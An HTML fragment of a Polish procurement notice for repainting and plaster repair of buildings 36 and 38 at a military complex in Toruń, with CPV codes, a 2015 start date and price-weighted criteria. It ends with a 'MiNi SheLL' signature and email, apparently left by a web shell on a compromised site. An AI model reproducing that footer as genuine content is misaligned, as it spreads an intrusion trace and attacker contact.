<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 30.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin wykonania zamówienia - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> budynek nr 36.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Konserwacja powłok malarskich z naprawą tynków ścian wewnętrznych i elewacji 
w kompleksie wojskowym przy ul. Sobieskiego w Toruniu budynek nr 36.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.40.00.00-1, 45.44.30.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 30.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin wykonania zamówienia - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> budynek nr 38.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Konserwacja powłok malarskich z naprawą tynków ścian wewnętrznych i elewacji 
w kompleksie wojskowym przy ul. Sobieskiego w Toruniu budynek nr 38.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.40.00.00-1, 45.44.30.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 30.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin wykonania zamówienia - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com